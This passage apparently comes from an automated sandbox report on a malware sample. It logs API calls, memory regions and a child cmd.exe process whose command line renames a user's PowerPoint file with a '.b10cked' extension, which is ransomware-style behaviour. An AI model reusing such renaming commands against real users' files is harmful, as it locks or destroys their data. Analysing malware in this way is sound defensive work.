hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.801] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: 
lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.802] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.802] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x32, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.803] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0232.803] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x32, lpOverlapped=0x0) returned 1 [0232.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.803] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.803] _close (_FileHandle=4) returned 0 [0232.803] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x2cef7c | out: lpFindFileData=0x2cef7c) returned 0 [0232.803] GetLastError () returned 0x12 [0232.803] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0232.804] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0232.804] _close (_FileHandle=3) returned 0 [0232.804] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.804] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.805] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.805] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.805] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.805] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.805] SetConsoleInputExeNameW () returned 0x1 [0232.805] GetConsoleOutputCP () returned 0x1b5 [0232.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.805] exit (_Code=0) Process: id = "619" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34465 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34466 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34467 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34468 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34469 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34470 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34471 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34472 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34473 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 34474 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34623 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34624 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34625 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 34626 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34627 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34628 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34629 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34630 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34631 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34632 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34633 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34634 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34635 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34636 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34719 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 34720 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34721 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34722 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34723 
start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 34724 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34725 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 34726 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 34727 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 34728 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 859 os_tid = 0x7d0 [0231.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f974 | out: lpSystemTimeAsFileTime=0x18f974*(dwLowDateTime=0xbdc41d00, dwHighDateTime=0x1d440a9)) [0231.885] GetCurrentProcessId () returned 0x9d8 [0231.885] GetCurrentThreadId () returned 0x7d0 [0231.885] GetTickCount () returned 0x3fce4 [0231.885] QueryPerformanceCounter (in: lpPerformanceCount=0x18f96c | out: lpPerformanceCount=0x18f96c*=28867419704) returned 1 [0231.886] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.886] __set_app_type (_Type=0x1) [0231.886] __p__fmode () returned 0x76b331f4 [0231.886] __p__commode () returned 0x76b331fc [0231.886] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.886] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.886] GetCurrentThreadId () returned 0x7d0 [0231.886] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7d0) returned 0x38 
[0231.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.886] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.886] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.921] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f904 | out: phkResult=0x18f904*=0x0) returned 0x2 [0231.921] VirtualQuery (in: lpAddress=0x18f93b, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] 
SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.953] GetEnvironmentStringsW () returned 0x1e02b0* [0231.953] FreeEnvironmentStringsW (penv=0x1e02b0) returned 1 [0231.953] GetEnvironmentStringsW () returned 0x1e02b0* [0231.953] FreeEnvironmentStringsW (penv=0x1e02b0) returned 1 [0231.953] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e874 | out: phkResult=0x18e874*=0x40) returned 0x0 [0231.953] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x60, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.953] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x4) returned 0x0 [0231.953] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x0, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegCloseKey (hKey=0x40) returned 0x0 [0231.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e874 | out: phkResult=0x18e874*=0x40) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e87c, 
lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x0, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x9, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x9, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x9, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegCloseKey (hKey=0x40) returned 0x0 [0231.954] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.954] srand (_Seed=0x5b8863bf) [0231.954] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"" [0231.954] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"" [0231.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e1a10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.955] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.955] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.955] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.955] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.955] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.955] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.955] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.955] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.955] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.955] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.956] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.956] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.956] GetEnvironmentStringsW () returned 0x1e2400* [0231.956] FreeEnvironmentStringsW (penv=0x1e2400) returned 1 [0231.956] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.956] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.956] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.956] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.956] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.956] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.956] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.956] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.956] _wcsicmp (_String1="KEYS", _String2="RANDOM") 
returned -7 [0231.956] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f640 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f640, lpFilePart=0x18f63c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f63c*="Desktop") returned 0x18 [0231.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.957] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f3bc | out: lpFindFileData=0x18f3bc) returned 0x1e0a90 [0231.957] FindClose (in: hFindFile=0x1e0a90 | out: hFindFile=0x1e0a90) returned 1 [0231.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f3bc | out: lpFindFileData=0x18f3bc) returned 0x1e0a90 [0231.957] FindClose (in: hFindFile=0x1e0a90 | out: hFindFile=0x1e0a90) returned 1 [0231.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f3bc | out: lpFindFileData=0x18f3bc) returned 0x1e0a90 [0231.957] FindClose (in: hFindFile=0x1e0a90 | out: hFindFile=0x1e0a90) returned 1 [0231.957] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.958] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.958] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.958] GetEnvironmentStringsW () returned 0x1e02b0* [0231.958] FreeEnvironmentStringsW (penv=0x1e02b0) returned 1 [0231.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.958] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
